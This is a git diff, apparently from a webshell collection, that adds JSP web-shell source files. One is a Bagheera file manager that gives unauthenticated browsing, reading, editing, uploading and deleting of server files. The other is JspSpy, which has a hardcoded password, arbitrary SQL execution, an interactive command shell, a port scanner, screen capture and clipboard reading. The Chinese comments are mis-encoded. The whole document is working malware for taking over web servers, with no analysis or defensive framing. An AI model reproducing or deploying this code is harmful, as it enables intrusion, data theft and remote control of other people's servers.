field = stLine.nextToken(); + stFields = new StringTokenizer(field, "=\""); + if (stFields.countTokens() > 1){ + if (stFields.nextToken().trim().equalsIgnoreCase("filename")){ + fileInfo.name=paramName; + String value = stFields.nextToken(); + if (value != null && value.trim().length() > 0){ + fileInfo.clientFileName=value; + isFile = true; + } + else{ + line = getLine(is); // ȥ"Content-Type:" + line = getLine(is); // ȥհ + line = getLine(is); // ȥհ + line = getLine(is); // λ + continue; + } + } + } + else if (field.toLowerCase().indexOf("filename") >= 0){ + line = getLine(is); // ȥ"Content-Type:" + line = getLine(is); // ȥհ + line = getLine(is); // ȥհ + line = getLine(is); // λ + continue; + } + } + boolean skipBlankLine = true; + if (isFile){ + line = getLine(is); + if (line == null) return dataTable; + if (line.trim().length() < 1) skipBlankLine = false; + else{ + stLine = new StringTokenizer(line, ": "); + if (stLine.countTokens() < 2) + throw new IllegalArgumentException("ִ!"); + stLine.nextToken(); + fileInfo.fileContentType=stLine.nextToken(); + } + } + if (skipBlankLine){ + line = getLine(is); + if (line == null) return dataTable; + } + if (!isFile){ + line = getLine(is); + if (line == null) return dataTable; + dataTable.put(paramName, line); + //жǷΪĿ¼ + if (paramName.equals("dir")){ + saveInDir = line; + System.out.println(line); + } + line = getLine(is); + continue; + } + try{ + OutputStream os = null; + String path = null; + if (saveFiles) + os = new FileOutputStream(path = getFileName(saveInDir, + fileInfo.clientFileName)); + else os = new ByteArrayOutputStream(ONE_MB); + boolean readingContent = true; + byte previousLine[] = new byte[2 * ONE_MB]; + byte temp[] = null; + byte currentLine[] = new byte[2 * ONE_MB]; + int read, read3; + if ((read = is.readLine(previousLine, 0, previousLine.length)) == -1) { + line = null; + break; + } + while (readingContent){ + if ((read3 = is.readLine(currentLine, 0, currentLine.length)) == -1) { + line = null; + break; + } + if (compareBoundary(boundary, currentLine)){ + os.write( previousLine, 0, read ); + os.flush(); + line = new String( currentLine, 0, read3 ); + break; + } + else{ + os.write( previousLine, 0, read ); + os.flush(); + temp = currentLine; + currentLine = previousLine; + previousLine = temp; + read = read3; + } + } + os.close(); + temp = null; + previousLine = null; + currentLine = null; + if (!saveFiles){ + ByteArrayOutputStream baos = (ByteArrayOutputStream)os; + fileInfo.setFileContents(baos.toByteArray()); + } + else{ + fileInfo.file = new File(path); + os = null; + } + dataTable.put(paramName, fileInfo); + } + catch (IOException e) { + throw e; + } + } + return dataTable; + } + + // Ƚ + private boolean compareBoundary(String boundary, byte ba[]){ + byte b; + if (boundary == null || ba == null) return false; + for (int i=0; i < boundary.length(); i++) + if ((byte)boundary.charAt(i) != ba[i]) return false; + return true; + } + + + private synchronized String getLine(ServletInputStream sis) throws IOException{ + byte b[] = new byte[1024]; + int read = sis.readLine(b, 0, b.length), index; + String line = null; + if (read != -1){ + line = new String(b, 0, read); + if ((index = line.indexOf('\n')) >= 0) line = line.substring(0, index-1); + } + b = null; + return line; + } + + public String getFileName(String dir, String fileName) throws IllegalArgumentException{ + String path = null; + if (dir == null || fileName == null) throw new IllegalArgumentException("Ŀ¼ļ!"); + int index = fileName.lastIndexOf('/'); + String name = null; + if (index >= 0) name = fileName.substring(index + 1); + else name = fileName; + index = name.lastIndexOf('\\'); + if (index >= 0) fileName = name.substring(index + 1); + path = dir + File.separator + fileName; + if (File.separatorChar == '/') return path.replace('\\', File.separatorChar); + else return path.replace('/', File.separatorChar); + } + } + + /** + * ΪļĿ¼ + * @author bagheera + * @version 1.001 + */ + class FileComp implements Comparator{ + int mode=1; + /** + * @򷽷 1=ļ, 2=С, 3= + */ + FileComp (int mode){ + this.mode=mode; + } + public int compare(Object o1, Object o2){ + File f1 = (File)o1; + File f2 = (File)o2; + if (f1.isDirectory()){ + if (f2.isDirectory()){ + switch(mode){ + case 1:return f1.getAbsolutePath().toUpperCase().compareTo(f2.getAbsolutePath().toUpperCase()); + case 2:return new Long(f1.length()).compareTo(new Long(f2.length())); + case 3:return new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())); + default:return 1; + } + } + else return -1; + } + else if (f2.isDirectory()) return 1; + else{ + switch(mode){ + case 1:return f1.getAbsolutePath().toUpperCase().compareTo(f2.getAbsolutePath().toUpperCase()); + case 2:return new Long(f1.length()).compareTo(new Long(f2.length())); + case 3:return new Long(f1.lastModified()).compareTo(new Long(f2.lastModified())); + default:return 1; + } + } + } + } + + + class Writer2Stream extends OutputStream{ + Writer out; + Writer2Stream (Writer w){ + super(); + out=w; + } + public void write(int i) throws IOException{ + out.write(i); + } + public void write(byte[] b) throws IOException{ + for (int i=0;i>>4)&0xF)*16+(n&0xF); + out.write (n); + } + } + public void write(byte[] b, int off, int len) throws IOException{ + for (int i=off;i>>4)&0xF)*16+(n&0xF); + out.write (n); + } + } + } + + static Vector expandFileList(String[] files, boolean inclDirs){ + Vector v = new Vector(); + if (files==null) return v; + for (int i=0;i -1 ){ + j = s.indexOf( search, i ); + if ( j > -1 ){ + s2.append( s.substring(i,j) ); + s2.append( replace ); + i = j + len; + } + } + s2.append( s.substring(i, s.length()) ); + return s2.toString(); + } + + + static String getDir (String dir, String name){ + if (!dir.endsWith(File.separator)) dir=dir+File.separator; + File mv = new File (name); + String new_dir=null; + if (!mv.isAbsolute()){ + new_dir=dir+name; + } + else new_dir=name; + return new_dir; + } +%> + +<% +request.setAttribute("dir", request.getParameter("dir")); +String browser_name = request.getRequestURI(); + +//鿴ļ +if (request.getParameter("file")!=null){ + File f = new File (request.getParameter("file")); + BufferedInputStream reader = new BufferedInputStream(new FileInputStream(f)); + int l = f.getName().lastIndexOf("."); + //жļ׺ + if (l>=0){ + String ext = f.getName().substring(l).toLowerCase(); + if (ext.equals(".jpg")||ext.equals(".jpeg")||ext.equals(".jpe")) + response.setContentType("image/jpeg"); + else if (ext.equals(".gif")) response.setContentType("image/gif"); + else if (ext.equals(".pdf")) response.setContentType("application/pdf"); + else if (ext.equals(".htm")||ext.equals(".html")||ext.equals(".shtml")) response.setContentType("text/html"); + else if (ext.equals(".avi")) response.setContentType("video/x-msvideo"); + else if (ext.equals(".mov")||ext.equals(".qt")) response.setContentType("video/quicktime"); + else if (ext.equals(".mpg")||ext.equals(".mpeg")||ext.equals(".mpe")) + response.setContentType("video/mpeg"); + else if (ext.equals(".zip")) response.setContentType("application/zip"); + else if (ext.equals(".tiff")||ext.equals(".tif")) response.setContentType("image/tiff"); + else if (ext.equals(".rtf")) response.setContentType("application/rtf"); + else if (ext.equals(".mid")||ext.equals(".midi")) response.setContentType("audio/x-midi"); + else if (ext.equals(".xl")||ext.equals(".xls")||ext.equals(".xlv")||ext.equals(".xla") + ||ext.equals(".xlb")||ext.equals(".xlt")||ext.equals(".xlm")||ext.equals(".xlk")) + response.setContentType("application/excel"); + else if (ext.equals(".doc")||ext.equals(".dot")) response.setContentType("application/msword"); + else if (ext.equals(".png")) response.setContentType("image/png"); + else if (ext.equals(".xml")) response.setContentType("text/xml"); + else if (ext.equals(".svg")) response.setContentType("image/svg+xml"); + else response.setContentType("text/plain"); + } + else response.setContentType("text/plain"); + response.setContentLength((int)f.length()); + out.clearBuffer(); + int i; + while ((i=reader.read())!=-1) out.write(i); + reader.close(); + out.flush(); +} +//ѡļΪzipļ +else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Save as zip"))){ + Vector v = expandFileList(request.getParameterValues("selfile"), false); + File dir_file = new File(""+request.getAttribute("dir")); + int dir_l = dir_file.getAbsolutePath().length(); + response.setContentType ("application/zip"); + response.setHeader ("Content-Disposition", "attachment;filename=\"bagheera.zip\""); + out.clearBuffer(); + ZipOutputStream zipout = new ZipOutputStream(new Writer2Stream(out)); + zipout.setComment("Created by JSP ļ 1.001"); + for (int i=0;i

    ļ"+f.getAbsolutePath()+ + "ڻ޶Ȩ

    "); + } +} + +else{ + if (request.getAttribute("dir")==null){ + request.setAttribute ("dir", application.getRealPath(".")); + } +%> + + + + + +<% +} +//ϴ +if ((request.getContentType()!=null)&&(request.getContentType().toLowerCase().startsWith("multipart"))){ + response.setContentType("text/html"); + HttpMultiPartParser parser = new HttpMultiPartParser(); + boolean error = false; + try{ + Hashtable ht = parser.processData(request.getInputStream(), "-", tempdir); + if (ht.get("myFile")!=null){ + FileInfo fi = (FileInfo)ht.get("myFile"); + File f = fi.file; + //ļӻĿ¼︴Ƴ + String path = (String)ht.get("dir"); + if (!path.endsWith(File.separator)) path = path+File.separator; + if (!f.renameTo(new File(path+f.getName()))){ + request.setAttribute("message", "޷ϴļ."); + error = true; + f.delete(); + } + } + else{ + request.setAttribute("message", "ѡϴļ!"); + error = true; + } + request.setAttribute("dir", (String)ht.get("dir")); + } + catch (Exception e){ + request.setAttribute("message", "´:"+e+". ϴʧ!"); + error = true; + } + if (!error) request.setAttribute("message", "ļϴɹ."); +} +else if (request.getParameter("editfile")!=null){ +%> +JSPļ-༭ļ:<%=request.getParameter("editfile")%> + + + +<% + String encoding="gb2312"; + request.setAttribute("dir", null); + File ef = new File(request.getParameter("editfile")); + BufferedReader reader = new BufferedReader(new FileReader(ef)); + String disable = ""; + if (!ef.canWrite()) disable = "޷ļ"; + out.print("
    \n"+ + " + "> + + + + + +
    д
    +
    + + +<% +} +//ļ +else if (request.getParameter("nfile")!=null){ + File f = new File(request.getParameter("nfile")); + File new_f = new File(getDir(f.getParent(), request.getParameter("new_name"))); + if (request.getParameter("Submit").equals("Save")){ + if (new_f.exists()&&request.getParameter("Backup")!=null){ + File bak = new File(new_f.getAbsolutePath()+".bak"); + bak.delete(); + new_f.renameTo(bak); + } + BufferedWriter outs = new BufferedWriter(new FileWriter(new_f)); + outs.write(request.getParameter("text")); + outs.flush(); + outs.close(); + } + request.setAttribute("dir", f.getParent()); +} +//ɾļ +else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Delete Files"))){ + Vector v = expandFileList(request.getParameterValues("selfile"), true); + boolean error = false; + for (int i=v.size()-1;i>=0;i--){ + File f = (File)v.get(i); + if (!f.canWrite()||!f.delete()){ + request.setAttribute("message", "޷ɾļ"+f.getAbsolutePath()+". ɾʧ"); + error = true; + break; + } + } + if ((!error)&&(v.size()>1)) request.setAttribute("message", "All files deleted"); + else if ((!error)&&(v.size()>0)) request.setAttribute("message", "File deleted"); + else if (!error) request.setAttribute("message", "No files selected"); +} +//Ŀ¼ +else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Create Dir"))){ + String dir = ""+request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir (dir, dir_name); + if (new File(new_dir).mkdirs()){ + request.setAttribute("message", "Ŀ¼"); + } + else request.setAttribute("message", "Ŀ¼"+new_dir+"ʧ"); +} +//ļ +else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Create File"))){ + String dir = ""+request.getAttribute("dir"); + String file_name = request.getParameter("cr_dir"); + String new_file = getDir (dir, file_name); + //Test, if file_name is empty + if ((file_name.trim()!="")&&!file_name.endsWith(File.separator)){ + if (new File(new_file).createNewFile()) request.setAttribute("message", "ļɹ"); + else request.setAttribute("message", "ļ"+new_file+"ʧ"); + } + else request.setAttribute("message", ": "+file_name+"ļ"); +} +//תļ +else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Move Files"))){ + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = ""+request.getAttribute("dir"); + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir+=File.separator; + for (int i=v.size()-1;i>=0;i--){ + File f = (File)v.get(i); + if (!f.canWrite()||!f.renameTo(new File(new_dir+f.getAbsolutePath().substring(dir.length())))){ + request.setAttribute("message", "ת"+f.getAbsolutePath()+".תʧ"); + error = true; + break; + } + } + if ((!error)&&(v.size()>1)) request.setAttribute("message", "ȫļתƳɹ"); + else if ((!error)&&(v.size()>0)) request.setAttribute("message", "ļתƳɹ"); + else if (!error) request.setAttribute("message", "ѡļ"); +} +//ļ +else if ((request.getParameter("Submit")!=null)&&(request.getParameter("Submit").equals("Copy Files"))){ + Vector v = expandFileList(request.getParameterValues("selfile"), true); + String dir = (String)request.getAttribute("dir"); + if (!dir.endsWith(File.separator)) dir+=File.separator; + String dir_name = request.getParameter("cr_dir"); + String new_dir = getDir(dir, dir_name); + boolean error = false; + if (!new_dir.endsWith(File.separator)) new_dir+=File.separator; + byte buffer[] = new byte[0xffff]; + try{ + for (int i=0;i1)) request.setAttribute("message", "ȫļƳɹ"); + else if ((!error)&&(v.size()>0)) request.setAttribute("message", "ļƳɹ"); + else if (!error) request.setAttribute("message", "ѡļ"); +} +//Ŀ¼ +if ((request.getAttribute("dir")!=null)){ +%> +JSPļ-Ŀ¼:<%=request.getAttribute("dir")%> + + + +
    +<% if (request.getAttribute("message")!=null){ + out.println("
    "); + out.println(request.getAttribute("message")); + out.println("
    "); +} +%> +
    + +<% + String dir = URLEncoder.encode(""+request.getAttribute("dir")); + String cmd = browser_name+"?dir="+dir; + out.println(""+ + ""+ + ""+ + ""); + char trenner=File.separatorChar; + File f=new File(""+request.getAttribute("dir")); + //߷ + File[] entry=File.listRoots(); + for (int i=0;i"); + out.println(""); + + } + out.println("
    "); + //.. + if (f.getParent()!=null){ + out.println(""); + out.println(""); + } + //ļĿ¼ + entry=f.listFiles(); + if (entry!=null&&entry.length>0){ + int mode=1; + if (request.getParameter("sort")!=null) mode = Integer.parseInt(request.getParameter("sort")); + Arrays.sort(entry, new FileComp(mode)); + String ahref = "["+buf+"]"; + else + link = "["+buf+"]"; + } + else{ + if (entry[i].canRead()){ + if (entry[i].canWrite()){ + link=ahref+browser_name+"?file="+name+"\">"+buf+""; + dlink=ahref+browser_name+"?downfile="+name+"\">"; + elink=ahref+browser_name+"?editfile="+name+"\">༭"; + } + else{ + link=ahref+browser_name+"?file="+name+"\">"+buf+""; + dlink=ahref+browser_name+"?downfile="+name+"\">"; + elink=ahref+browser_name+"?editfile="+name+"\">鿴"; + } + } + else{ + link = buf; + } + } + String date = DateFormat.getDateTimeInstance().format(new Date(entry[i].lastModified())); + out.println(""); + out.println(""); + out.println(""); + } + } +%> +
    ļС  лӦ̷"); + String name = URLEncoder.encode(entry[i].getAbsolutePath()); + String buf = entry[i].getAbsolutePath(); + out.println("["+buf+"]"); + out.println("
    "); + out.println("[..]"); + out.println("
    "+link+""+entry[i].length()+ + " bytes"+ + date+"" + +dlink+""+elink+"
    + +"> + + + + + + + + + +
    +
    + +
    + + + + + +
    "> +
    +
    +
    +
    JSP ļ v1.001 By Bagheerahttp://jmmm.com +
    +
    + + +<% +} +%> diff --git a/jsp/hackk8/fuck-jsp/ma3.jsp b/jsp/hackk8/fuck-jsp/ma3.jsp new file mode 100644 index 0000000..57098eb --- /dev/null +++ b/jsp/hackk8/fuck-jsp/ma3.jsp @@ -0,0 +1,2317 @@ +<%@page pageEncoding="utf-8"%> +<%@page import="java.io.*"%> +<%@page import="java.util.*"%> +<%@page import="java.util.regex.*"%> +<%@page import="java.sql.*"%> +<%@page import="java.nio.charset.*"%> +<%@page import="javax.servlet.http.HttpServletRequestWrapper"%> +<%@page import="java.text.*"%> +<%@page import="java.net.*"%> +<%@page import="java.util.zip.*"%> +<%@page import="java.awt.*"%> +<%@page import="java.awt.image.*"%> +<%@page import="javax.imageio.*"%> +<%@page import="java.awt.datatransfer.DataFlavor"%> +<%@page import="java.util.prefs.Preferences"%> +<%! +private static final String PW = "xuying"; +private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; +private static final String REQUEST_CHARSET = "ISO-8859-1"; +private static final String PAGE_CHARSET = "UTF-8"; +private static final String CURRENT_DIR = "currentdir"; +private static final String MSG = "SHOWMSG"; +private static final String PORT_MAP = "PMSA"; +private static final String DBO = "DBO"; +private static final String SHELL_ONLINE = "SHELL_ONLINE"; +private static String SHELL_NAME = ""; +private static String WEB_ROOT = null; +private static String SHELL_DIR = null; +public static Map ins = new HashMap(); +private static class MyRequest extends HttpServletRequestWrapper { +public MyRequest(HttpServletRequest req) { +super(req); +} +public String getParameter(String name) { +try { +String value = super.getParameter(name); +if (name == null) +return null; +return new String(value.getBytes(REQUEST_CHARSET),PAGE_CHARSET); +} catch (Exception e) { +return null; +} +} +} +private static class DBOperator{ +private Connection conn = null; +private Statement stmt = null; +private String driver; +private String url; +private String uid; +private String pwd; +public DBOperator(String driver,String url,String uid,String pwd) throws Exception { +this(driver,url,uid,pwd,false); +} +public DBOperator(String driver,String url,String uid,String pwd,boolean connect) throws Exception { +Class.forName(driver); +if (connect) +this.conn = DriverManager.getConnection(url,uid,pwd); +this.url = url; +this.driver = driver; +this.uid = uid; +this.pwd = pwd; +} +public void connect() throws Exception{ +this.conn = DriverManager.getConnection(url,uid,pwd); +} +public Object execute(String sql) throws Exception { +if (isValid()) { +stmt = conn.createStatement(); +if (stmt.execute(sql)) { +return stmt.getResultSet(); +} else { +return stmt.getUpdateCount(); +} +} +throw new Exception("Connection is inValid."); +} +public void closeStmt() throws Exception{ +if (this.stmt != null) +stmt.close(); +} +public boolean isValid() throws Exception { +return conn != null && !conn.isClosed(); +} +public void close() throws Exception { +if (isValid()) { +closeStmt(); +conn.close(); +} +} +public boolean equals(Object o) { +if (o instanceof DBOperator) { +DBOperator dbo = (DBOperator)o; +return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); +} +return false; +} +} +private static class StreamConnector extends Thread { +private InputStream is; +private OutputStream os; +public StreamConnector( InputStream is, OutputStream os ){ +this.is = is; +this.os = os; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[8192]; +int length; +while((length = in.read( buffer, 0, buffer.length ))>0){ +out.write( buffer, 0, length ); +out.flush(); +} +} catch(Exception e){} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){} +} +} +private static class OnLineProcess { +private String cmd = "first"; +private Process pro; +public OnLineProcess(Process p){ +this.pro = p; +} +public void setPro(Process p) { +this.pro = p; +} +public void setCmd(String c){ +this.cmd = c; +} +public String getCmd(){ +return this.cmd; +} +public Process getPro(){ +return this.pro; +} +public void stop(){ +this.pro.destroy(); +} +} +private static class OnLineConnector extends Thread { +private OnLineProcess ol = null; +private InputStream is; +private OutputStream os; +private String name; +public OnLineConnector( InputStream is, OutputStream os ,String name,OnLineProcess ol){ +this.is = is; +this.os = os; +this.name = name; +this.ol = ol; +} +public void run(){ +BufferedReader in = null; +BufferedWriter out = null; +try{ +in = new BufferedReader( new InputStreamReader(this.is)); +out = new BufferedWriter( new OutputStreamWriter(this.os)); +char buffer[] = new char[128]; +if(this.name.equals("exeRclientO")) { +//from exe to client +int length = 0; +while((length = in.read( buffer, 0, buffer.length ))>0){ +String str = new String(buffer, 0, length); +str = str.replace("&","&").replace("<","<").replace(">",">"); +str = str.replace(""+(char)13+(char)10,"
    "); +str = str.replace("\n","
    "); +out.write(str.toCharArray(), 0, str.length()); +out.flush(); +} +} else { +//from client to exe +while(true) { +while(this.ol.getCmd() == null) { +Thread.sleep(500); +} +if (this.ol.getCmd().equals("first")) { +this.ol.setCmd(null); +continue; +} +this.ol.setCmd(this.ol.getCmd() + (char)10); +char[] arr = this.ol.getCmd().toCharArray(); +out.write(arr,0,arr.length); +out.flush(); +this.ol.setCmd(null); +} +} +} catch(Exception e){ +} +try{ +if(in != null) +in.close(); +if(out != null) +out.close(); +} catch( Exception e ){ +} +} +} +private static class Table{ +private ArrayList rows = null; +private boolean echoTableTag = false; +public void setEchoTableTag(boolean v) { +this.echoTableTag = v; +} +public Table(){ +this.rows = new ArrayList(); +} +public void addRow(Row r) { +this.rows.add(r); +} +public String toString(){ +StringBuilder html = new StringBuilder(); +if (echoTableTag) +html.append(""); +for (Row r:rows) { +html.append(""); +for (Column c:r.getColumns()) { +html.append(""); +} +html.append(""); +} +if (echoTableTag) +html.append("
    "); +String vv = Util.htmlEncode(Util.getStr(c.getValue())); +if (vv.equals("")) +vv = " "; +html.append(vv); +html.append("
    "); +return html.toString(); +} +} +private static class Row{ +private ArrayList cols = null; +public Row(){ +this.cols = new ArrayList(); +} +public void addColumn(Column n) { +this.cols.add(n); +} +public ArrayList getColumns(){ +return this.cols; +} +} +private static class Column{ +private String value; +public Column(String v){ +this.value = v; +} +public String getValue(){ +return this.value; +} +} +private static class Util{ +public static boolean isEmpty(String s) { +return s == null || s.trim().equals(""); +} +public static boolean isEmpty(Object o) { +return o == null || isEmpty(o.toString()); +} +public static String getSize(long size,char danwei) { +if (danwei == 'M') { +double v = formatNumber(size / 1024.0 / 1024.0,2); +if (v > 1024) { +return getSize(size,'G'); +}else { +return v + "M"; +} +} else if (danwei == 'G') { +return formatNumber(size / 1024.0 / 1024.0 / 1024.0,2)+"G"; +} else if (danwei == 'K') { +double v = formatNumber(size / 1024.0,2); +if (v > 1024) { +return getSize(size,'M'); +} else { +return v + "K"; +} +} else if (danwei == 'B') { +if (size > 1024) { +return getSize(size,'K'); +}else { +return size + "B"; +} +} +return ""+0+danwei; +} +public static double formatNumber(double value,int l) { +NumberFormat format = NumberFormat.getInstance(); +format.setMaximumFractionDigits(l); +format.setGroupingUsed(false); +return new Double(format.format(value)); +} +public static boolean isInteger(String v) { +if (isEmpty(v)) +return false; +return v.matches("^\\d+$"); +} +public static String formatDate(long time) { +SimpleDateFormat format = new SimpleDateFormat("yyyy-MM-dd hh:mm:ss"); +return format.format(new java.util.Date(time)); +} +public static String convertPath(String path) { +return path != null ? path.replace("\\","/") : ""; +} +public static String htmlEncode(String v) { +if (isEmpty(v)) +return ""; +return v.replace("&","&").replace("<","<").replace(">",">"); +} +public static String getStr(String s) { +return s == null ? "" :s; +} +public static String getStr(Object s) { +return s == null ? "" :s.toString(); +} +public static String exec(String regex, String str, int group) { +Pattern pat = Pattern.compile(regex); +Matcher m = pat.matcher(str); +if (m.find()) +return m.group(group); +return null; +} +public static void outMsg(Writer out,String msg) throws Exception { +outMsg(out,msg,"center"); +} +public static void outMsg(Writer out,String msg,String align) throws Exception { +if (msg.indexOf("java.lang.ClassNotFoundException") != -1) +msg = "Can Not Find The Driver!
    " + msg; +out.write("
    "+msg+"
    "); +} +} +private static class UploadBean { +private String fileName = null; +private String suffix = null; +private String savePath = ""; +private ServletInputStream sis = null; +private byte[] b = new byte[1024]; +public UploadBean() { +} +public void setSavePath(String path) { +this.savePath = path; +} +public void parseRequest(HttpServletRequest request) throws IOException { +sis = request.getInputStream(); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!= -1) { +s = new String(b, 0, a,PAGE_CHARSET); +if ((k = s.indexOf("filename=\""))!= -1) { +s = s.substring(k + 10); +k = s.indexOf("\""); +s = s.substring(0, k); +File tF = new File(s); +if (tF.isAbsolute()) { +fileName = tF.getName(); +} else { +fileName = s; +} +k = s.lastIndexOf("."); +suffix = s.substring(k + 1); +upload(); +} +} +} +private void upload() { +try { +FileOutputStream out = new FileOutputStream(new File(savePath,fileName)); +int a = 0; +int k = 0; +String s = ""; +while ((a = sis.readLine(b,0,b.length))!=-1) { +s = new String(b, 0, a); +if ((k = s.indexOf("Content-Type:"))!=-1) { +break; +} +} +sis.readLine(b,0,b.length); +while ((a = sis.readLine(b,0,b.length)) != -1) { +s = new String(b, 0, a); +if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { +break; +} +out.write(b, 0, a); +} +out.close(); +} catch (IOException ioe) { +ioe.printStackTrace(); +} +} +} +%> +<% +SHELL_NAME = request.getServletPath().substring(request.getServletPath().lastIndexOf("/")+1); +String myAbsolutePath = application.getRealPath(request.getServletPath()); +if (Util.isEmpty(myAbsolutePath)) {//for weblogic +SHELL_NAME = request.getServletPath(); +myAbsolutePath = new File(application.getResource("/").getPath()+SHELL_NAME).toString(); +SHELL_NAME=request.getContextPath()+SHELL_NAME; +WEB_ROOT = new File(application.getResource("/").getPath()).toString(); +} else { +WEB_ROOT = application.getRealPath("/"); +} +SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0,myAbsolutePath.lastIndexOf(File.separator))); +if (session.getAttribute(CURRENT_DIR) == null) +session.setAttribute(CURRENT_DIR,Util.convertPath(SHELL_DIR)); +request = new MyRequest(request); +if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { +String o = request.getParameter("o"); +if (o != null && o.equals("login")) { +ins.get("login").invoke(request,response,session); +return; +} else if (o != null && o.equals("vLogin")) { +ins.get("vLogin").invoke(request,response,session); +return; +} else { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} +} +%> +<%! +private static interface Invoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception; +public boolean doBefore(); +public boolean doAfter(); +} +private static class DefaultInvoker implements Invoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +} +public boolean doBefore(){ +return true; +} +public boolean doAfter() { +return true; +} +} +private static class ScriptInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); + +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BeforeInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("JspSpy Codz By - Ninty"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class AfterInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DeleteBatchInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (!Util.isEmpty(files)) { +String currentDir = JSession.getAttribute(CURRENT_DIR).toString(); +String[] arr = files.split(","); +for (String fs:arr) { +File f = new File(currentDir,fs); +f.delete(); +} +} +JSession.setAttribute(MSG,"Delete Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ClipBoardInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    System Clipboard »

    "+ +"

    ");
+try{
+out.println(Util.htmlEncode(Util.getStr(Toolkit.getDefaultToolkit().getSystemClipboard().getData(DataFlavor.stringFlavor))));
+}catch (Exception ex) {
+out.println("ClipBoard is Empty Or Is Not Text Data !");
+}
+out.println("
    "+ +" "+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VRemoteControlInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
    "+ +"

    Remote Control »

    "+ +" Speed(Second , dont be so fast) Can Not Control Yet."+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//GetScreen +private static class GcInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Dimension size = Toolkit.getDefaultToolkit().getScreenSize(); +Rectangle rec = new Rectangle(0,0,(int)size.getWidth(),(int)size.getHeight()); +BufferedImage img = new Robot().createScreenCapture(rec); +response.setContentType("image/jpeg"); +ImageIO.write(img,"jpg",response.getOutputStream()); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VPortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +if (Util.isEmpty(ip)) +ip = "127.0.0.1"; +if (Util.isEmpty(ports)) +ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; +if (Util.isEmpty(timeout)) +timeout = "2"; +out.println("
    "+ +"

    PortScan >>

    "+ +"
    "+ +"

    "+ +"IP : Port : Timeout (秒? : "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class PortScanInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +ins.get("vPortScan").invoke(request,response,JSession); +String ip = request.getParameter("ip"); +String ports = request.getParameter("ports"); +String timeout = request.getParameter("timeout"); +int iTimeout = 0; +if (Util.isEmpty(ip) || Util.isEmpty(ports)) +return; +if (!Util.isInteger(timeout)) { +timeout = "2"; +} +iTimeout = Integer.parseInt(timeout); +Map rs = new LinkedHashMap(); +String[] portArr = ports.split(","); +for (String port:portArr) { +try { +Socket s = new Socket(); +s.connect(new InetSocketAddress(ip,Integer.parseInt(port)),iTimeout); +s.close(); +rs.put(port,"Open"); +} catch (Exception e) { +rs.put(port,"Close"); +} +} +out.println("
